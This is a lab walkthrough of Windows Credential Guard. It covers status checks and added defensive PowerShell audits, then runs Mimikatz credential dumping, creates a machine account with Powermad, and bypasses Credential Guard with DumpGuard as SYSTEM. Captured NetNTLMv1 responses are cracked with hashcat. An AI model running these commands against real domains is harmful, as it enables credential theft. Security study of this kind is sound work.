Credential Guard is a Windows security feature that protects domain credentials (NTLM password hashes, Kerberos TGTs and the keys derived from them) from being extracted from LSASS memory.
It does this with Virtualization-Based Security (VBS): the hypervisor isolates the secrets from the normal Windows operating system, including code running in the kernel.
Checking for Credential Guard
When Credential Guard is configured, the system runs an LsaIso.exe process (Isolated Local Security Authority). This process runs inside VTL1 (Virtual Trust Level 1), a hypervisor-enforced environment kept separate from the rest of the operating system code, which runs in VTL0.
PS C:\Users\alice> tasklist | findstr /i lsa
LsaIso.exe 732 Services 0 4,356 K
lsass.exe 740 Services 0 22,232 K
However, the presence of the process does not by itself prove that Credential Guard is protecting secrets. To confirm that, query the Win32_DeviceGuard CIM (WMI) class:
PS C:\Users\alice> (Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard)
AvailableSecurityProperties : {1, 2, 5}
CodeIntegrityPolicyEnforcementStatus : 0
InstanceIdentifier : 4ff40742-2649-41b8-bdd1-e80fad1cce80
RequiredSecurityProperties : {1, 2}
SecurityServicesConfigured : {1}
SecurityServicesRunning : {1}
UsermodeCodeIntegrityPolicyEnforcementStatus : 0
Version : 1.0
VirtualizationBasedSecurityStatus : 2
VirtualMachineIsolation : False
VirtualMachineIsolationProperties : {0}
PSComputerName :
SecurityServicesRunning lists the VBS services that are currently active: 1 is Credential Guard and 2 is HVCI (memory integrity). If it contains 1, Credential Guard is in use. If 1 appears only in SecurityServicesConfigured, Credential Guard is enabled but not yet running, which usually means a reboot is pending. A VirtualizationBasedSecurityStatus of 2 means VBS itself is enabled and running.
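As an added example (not code from the original post), the PowerShell below turns the raw Win32_DeviceGuard output into a readable verdict and cross-checks it against the LsaIso.exe process and the LsaCfgFlags registry values. The code meanings it decodes (VBS status 0/1/2; service codes 1 = Credential Guard, 2 = HVCI; LsaCfgFlags 0/1/2) are the ones Microsoft documents for the class and the registry value; the function name and output layout are my own.

```powershell
# Added example: decode Win32_DeviceGuard and cross-check Credential Guard state.
# Documented code meanings (Win32_DeviceGuard class):
#   VirtualizationBasedSecurityStatus: 0 = not enabled, 1 = enabled but not running, 2 = running
#   SecurityServicesConfigured/Running: 1 = Credential Guard, 2 = HVCI
# LsaCfgFlags (HKLM\SYSTEM\CurrentControlSet\Control\Lsa, or the DeviceGuard policy key):
#   0 = disabled, 1 = enabled with UEFI lock, 2 = enabled without UEFI lock
function Get-CredentialGuardState {
    $dg = Get-CimInstance -ClassName Win32_DeviceGuard `
                          -Namespace root\Microsoft\Windows\DeviceGuard

    $vbsText = @{ 0 = 'Not enabled'; 1 = 'Enabled, not running'; 2 = 'Enabled and running' }
    $svcText = @{ 1 = 'Credential Guard'; 2 = 'HVCI' }

    # Map a list of service codes to names, keeping unknown codes visible.
    $decodeServices = {
        param($codes)
        @($codes | ForEach-Object {
            if ($svcText.ContainsKey([int]$_)) { $svcText[[int]$_] } else { "Unknown($_)" }
        })
    }

    $vbsCode = [int]$dg.VirtualizationBasedSecurityStatus
    $vbs = if ($vbsText.ContainsKey($vbsCode)) { $vbsText[$vbsCode] } else { "Unknown($vbsCode)" }

    $configured   = & $decodeServices $dg.SecurityServicesConfigured
    $running      = & $decodeServices $dg.SecurityServicesRunning
    $cgConfigured = [bool]($dg.SecurityServicesConfigured -contains 1)
    $cgRunning    = [bool]($dg.SecurityServicesRunning -contains 1)

    # The effective value LSA reads at boot, and the value Group Policy writes.
    $lsaCfg = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
                                -Name LsaCfgFlags -ErrorAction SilentlyContinue).LsaCfgFlags
    $polCfg = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard' `
                                -Name LsaCfgFlags -ErrorAction SilentlyContinue).LsaCfgFlags

    [PSCustomObject]@{
        VbsStatus              = $vbs
        ServicesConfigured     = ($configured -join ', ')
        ServicesRunning        = ($running -join ', ')
        CredentialGuardRunning = $cgRunning
        # Configured but not running usually means a reboot is still pending.
        CredentialGuardPending = ($cgConfigured -and -not $cgRunning)
        LsaIsoProcessPresent   = [bool](Get-Process -Name LsaIso -ErrorAction SilentlyContinue)
        LsaCfgFlags            = $lsaCfg
        PolicyLsaCfgFlags      = $polCfg
        # With the UEFI lock set, the feature cannot be switched off by a registry change alone.
        UefiLocked             = ($lsaCfg -eq 1)
    }
}

Get-CredentialGuardState | Format-List
```

The interesting states for an assessment are CredentialGuardPending (enabled by policy but not yet protecting anything) and an LsaIso.exe process with no 1 in ServicesRunning, both of which the raw tasklist check above would misreport as "protected".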
We can also obtain the same information with the C# enumeration tool developed earlier.
C:\>EnumMitigations.exe
[Device Guard]
VBS Status: Enabled
Credential Guard: Enabled
Memory Integrity (HVCI): Disabled
Configured Services: Credential Guard
Running Services: Credential Guard
[Tamper Protection]
Tamper Protection: Disabled
[Vulnerable Driver Blocklist]
Status: Disabled
Testing Mimikatz
Running Mimikatz on the host with Credential Guard enabled, sekurlsa::logonpasswords cannot return the NTLM hash for the domain user "alice". The line "LSA Isolated Data: NtlmHash" shows that LSASS only holds an encrypted blob; the key material needed to use it lives in LsaIso in VTL1.
The built-in Administrator account is still dumped in the clear, NTLM and SHA1 hashes included. Note the domain column: it is CREDGUARD, the hostname, so this is the local RID 500 account rather than the domain administrator. Credential Guard only protects domain credentials; local accounts (and Microsoft accounts) stay in LSASS exactly as before.
C:\Mimikatz>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1231743 (00000000:0012cb7f)
Session : RemoteInteractive from 3
User Name : alice
Domain : BORDERGATE
Logon Server : DC01
Logon Time : 12/02/2026 09:55:40
SID : S-1-5-21-906755679-2821052173-3607654525-1104
msv :
[00000003] Primary
* Username : alice
* Domain : BORDERGATE
* LSA Isolated Data: NtlmHash
KdfContext: bde9a832e1e47dfef8049e9da4ca78369b9016d357f8f49e0cd69d74d26d1c10
Tag : b4676de32733622ecd8e4571d7e5af67
AuthData : 0100000000000000000000000000000001000000340000004e746c6d48617368
Encrypted : 9bb6d131d14f31d3d7ad372f6a5329970fa44abb5ea6509b1d0fbd5d0adc8c010f71db6b79a95400c692870b041b8e9b2d58c32b
* DPAPI : 5df8e817eccf29239fc35709edd9b2ea
tspkg :
wdigest :
* Username : alice
* Domain : BORDERGATE
* Password : (null)
kerberos :
* Username : alice
* Domain : BORDERGATE.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 322698 (00000000:0004ec8a)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : CREDGUARD
Logon Server : CREDGUARD
Logon Time : 12/02/2026 09:48:33
SID : S-1-5-21-1723896210-2506726654-3363034921-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : CREDGUARD
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
tspkg :
wdigest :
* Username : Administrator
* Domain : CREDGUARD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : CREDGUARD
* Password : (null)
ssp :
credman :
cloudap :
mimikatz(commandline) # exit
Bye!
Bypassing Credential Guard
To bypass Credential Guard, we can use the tool DumpGuard. A full technical breakdown of how the tool works is available here: https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/
For the tool to work, two things must be in place: the target host must accept Remote Credential Guard connections, and you must control a computer account in the domain.
With Remote Credential Guard, the RDP client never sends its credentials to the server. Instead, the server forwards authentication requests back to the client, which performs the authentication on the server's behalf and returns the result. The remote host is effectively an authentication proxy back to the client.
If an adversary controls a computer account, they can relay authentication through that proxy back to the client, where DumpGuard intercepts the responses.
By default, any authenticated domain user can create up to 10 computer accounts (the ms-DS-MachineAccountQuota attribute on the domain). Use Powermad.ps1 to create one with a known password:
PS C:\Powermad> . .\Powermad.ps1
PS C:\Powermad> New-MachineAccount -MachineAccount TestMachine
Enter a password for the new machine account: *********
[+] Machine account TestMachine added
PS C:\Powermad>
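The following PowerShell is an added example, not part of the original post or of DumpGuard. It checks the two preconditions from the defender's side, lists computer objects created through the quota, and can set the quota to zero. It assumes a domain-joined host with LDAP access to a domain controller and uses ADSI rather than the ActiveDirectory module; the function name and its switch are my own.

```powershell
# Added example: does this host and domain satisfy the two DumpGuard preconditions?
#  1. Remote Credential Guard is only accepted by an RDP host where DisableRestrictedAdmin
#     exists and is 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
#  2. Any user can add computer accounts while ms-DS-MachineAccountQuota is above 0.
# Computers created through the quota carry the creator's SID in mS-DS-CreatorSID,
# which makes them easy to list; accounts created by privileged admins do not.
function Test-DumpGuardExposure {
    param([switch]$SetMachineAccountQuotaZero)   # hypothetical switch, applies the hardening

    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $rcgAllowed = ($null -ne $lsa.DisableRestrictedAdmin) -and ([int]$lsa.DisableRestrictedAdmin -eq 0)

    $rootDse  = [ADSI]'LDAP://RootDSE'
    $domainDn = $rootDse.Properties['defaultNamingContext'].Value
    $domain   = [ADSI]"LDAP://$domainDn"
    $quota    = [int]$domain.Properties['ms-DS-MachineAccountQuota'].Value

    $searcher = New-Object System.DirectoryServices.DirectorySearcher($domain)
    $searcher.Filter   = '(&(objectCategory=computer)(mS-DS-CreatorSID=*))'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(@('sAMAccountName', 'mS-DS-CreatorSID', 'whenCreated'))
    $quotaCreated = @(foreach ($r in $searcher.FindAll()) {
        $sidBytes = $r.Properties['ms-ds-creatorsid'][0]
        [PSCustomObject]@{
            Computer   = $r.Properties['samaccountname'][0]
            CreatorSid = (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
            Created    = $r.Properties['whencreated'][0]
        }
    })

    if ($SetMachineAccountQuotaZero -and $quota -ne 0) {
        # Requires write access to the domain object (Domain Admins by default).
        $domain.Properties['ms-DS-MachineAccountQuota'].Value = 0
        $domain.CommitChanges()
        $quota = 0
    }

    [PSCustomObject]@{
        RemoteCredentialGuardAllowed = $rcgAllowed
        MachineAccountQuota          = $quota
        QuotaCreatedComputers        = $quotaCreated
        PreconditionsMet             = ($rcgAllowed -and $quota -gt 0)
    }
}

Test-DumpGuardExposure | Format-List
```

PreconditionsMet only covers the cheap path (any user minting a TestMachine-style account); an attacker who already controls a real workstation has a computer account regardless of the quota, so the host-side setting is the control that matters most. Setting the quota to zero and alerting on computer-account creation events (4741) on the domain controllers removes the easy route without touching Remote Credential Guard.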
To extract other users' credentials with DumpGuard, you need SYSTEM on the host. Use PsExec to open a SYSTEM shell:
C:\DumpGuard>PsExec64.exe -s -i cmd.exe
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
Running DumpGuard as SYSTEM retrieves NetNTLMv1 responses for alice and bob, the domain users whose secrets are isolated. The local Administrator account is not captured: as established above, its hash was never in LsaIso in the first place (Mimikatz read it directly from LSASS), and the error line shows the tool giving up on that account when the client attempts to negotiate NTLM for it.
C:\DumpGuard>.\DumpGuard.exe /mode:all /domain:bordergate.local /username:TestMachine /password:Password1 /spn:HOST/TestMachine
BORDERGATE\alice::CREDGUARD::8614B8A84404B1C0333C8875A22BC10690BBF6A7EDCF549D:1122334455667788
Failed to dump credentials for 'CREDGUARD\Administrator': The client attempted to negotiate using NTLM
BORDERGATE\bob::CREDGUARD::8614B8A84404B1C0333C8875A22BC10690BBF6A7EDCF549D:1122334455667788
The captured values are NetNTLMv1 challenge/response pairs (note the fixed 1122334455667788 server challenge), which hashcat cracks with mode 5500:
┌──(kali㉿kali)-[~]
└─$ hashcat -D 1 -m 5500 captured_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-AMD Ryzen 7 5700X3D 8-Core Processor, 2223/4446 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 513 MB (4601 MB free)
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
BORDERGATE\alice::CREDGUARD::8614b8a84404b1c0333c8875a22bc10690bbf6a7edcf549d:1122334455667788:Password1
In Conclusion
DumpGuard is effective at extracting secrets for Credential Guard-protected logons, provided you have SYSTEM on the host and control a machine account. NetNTLMv1 responses are particularly weak: a wordlist attack usually breaks them in seconds, and because the challenge is the fixed value 1122334455667788, the response can also be reversed to the NT hash itself through a DES known-plaintext attack (hashcat mode 14000 or crack.sh's rainbow tables), without ever recovering the password.